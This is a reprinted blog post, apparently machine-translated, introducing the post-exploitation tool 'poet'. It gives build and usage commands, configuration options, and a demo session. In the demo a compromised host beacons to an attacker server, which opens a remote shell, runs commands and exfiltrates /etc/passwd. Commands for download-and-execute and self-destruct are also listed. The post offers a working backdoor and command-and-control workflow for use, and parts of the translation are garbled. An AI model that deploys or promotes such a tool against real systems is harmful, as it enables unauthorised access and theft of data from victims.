IMCAFS

 Home

poet: a powerful post penetration tool

Posted by santillano at 2020-02-24
all

Summary

The client program needs to run in the target system and configure an IP address and frequency to connect with the server. If the server is not online when the client attempts to connect to the server, the client will be in a silent sleep state and wait for the next time interval to try to connect. If the server is running, the attacker can get the shell, then control the client and perform various operations in the target host, such as:

1. Network reconnaissance;

2. Remote shell;

3. Document extraction;

4. Download and execute payload;

5. Procedure self destruction

Tool download

Poet: [GitHub home page]

Please visit GitHub's releases page and download the latest version of pot client and pot server files, or you can build your own pot project as follows.

Build code

Make sure you have Python 2.7 and the zip executable installed, and then run the following command:

$ git clonehttps://github.com/mossberg/poet $ cd poet $ make

After running, you will create a bin / directory containing the pot client and pot server in your computer.

Tool usage

Poet is a very simple tool to use. It only needs Python 2.7 standard library to run. Here is a simple example:

Terminal 1:

$ ./client.py -v 127.0.0.1 1

Terminal 2:

$ sudo ./server.py

Note: in the default configuration, the server needs to run with root permission (using sudo command), because the default port bound by the tool is 443. Of course, you can also use the - P < port > command to modify the port used by the client and server. It is recommended to use a port larger than 1024.

In addition, you can use the - H option to view the help menu:

Client:

$ ./client.py -h usage: client.py [-h] [-p PORT] [-v] [-d]IP INTERVAL   positional arguments:  IP                    server  INTERVAL              (s)   optional arguments:   -h,--help            show this help messageand exit   -pPORT, --port PORT   -v,--verbose   -d,--delete          delete client uponexecution

Server side:

$ ./server.py -h usage: server.py [-h] [-p PORT]   optional arguments:   -h,--help            show this help messageand exit   -pPORT, --port PORT

Configuration reference

The common / config.py file contains a variety of configuration options:

1. Auth: the secret authentication token needs to be shared between the client and the server to complete the identity authentication of the client. The precompiled packet uses the default public authentication token. It is recommended that the user set a complex token to ensure the security of communication.

2. Archive? Dir: the directory used by the server to store files (output data or extracted files).

3. Server? IP: the IP address of the server.

4. Beacon ﹣ interval: the time interval (in seconds) between the arrival of the client beacon at the server.

Poe use demo

In the following attack scenario, the attacker has obtained the access right of the target host and downloaded and executed the client program in the target system. At this time, the attacker's server is not running, but it doesn't matter. The client will wait patiently. Finally, the attacker opened the server side. He first opened a shell and executed the command uname-a, then extracted / etc / passwd. Next, he disconnects from the client program, and the client will continue to run in the background of the target host and wait for the next connection with the server.

Target equipment (5.4.3.2):

$ ./client.py -v 1.2.3.4 10 [+] Poet started with delay of 10 secondsto port 443. Ctrl-c to exit. [!] (2014-09-06 02:07:03.058921) Server isinactive [!] (2014-09-06 02:07:13.060840) Server isinactive [!] (2014-09-06 02:07:23.062512) Server isinactive [!] (2014-09-06 02:07:33.064214) Server isinactive [+] (2014-09-06 02:07:43.066828) Server isactive [!] (2014-09-06 02:08:50.403668) Server isinactive [!] (2014-09-06 02:09:00.405364) Server isinactive

Attacker's device (1.2.3.4)

# ./server.py [+] Poet server started on 443. [i] (2014-09-06 02:07:43.066092) ConnectedBy: ('5.4.3.2', 62209) [+] (2014-09-06 02:07:43.066531) Enteringcontrol shell Welcome to psh, the poet shell! Running `help' will give you a list ofsupported commands. psh > shell psh > [email protected] $ uname -a Linux lolServer 3.8.0-29-generic#42~precise1-Ubuntu SMP Wed May 07 16:19:23 UTC 2014 x86_64 x86_64 x86_64GNU/Linux psh > [email protected] $ ^D psh > exfil /etc/passwd psh : exfil written toarchive/20140906/exfil/passwd psh > help Commands:  chint  dlexec  exec  exfil  exit  help  recon  selfdestruct  shell psh > exit [+] (2014-09-06 02:08:40.401181) Exitingcontrol shell. [-] (2014-09-06 02:08:40.401328) Poetterminated.

*Reference source: n0where, compiled by FB editor alpha ﹤ h4ck, reprinted from freebuf.com

© 2023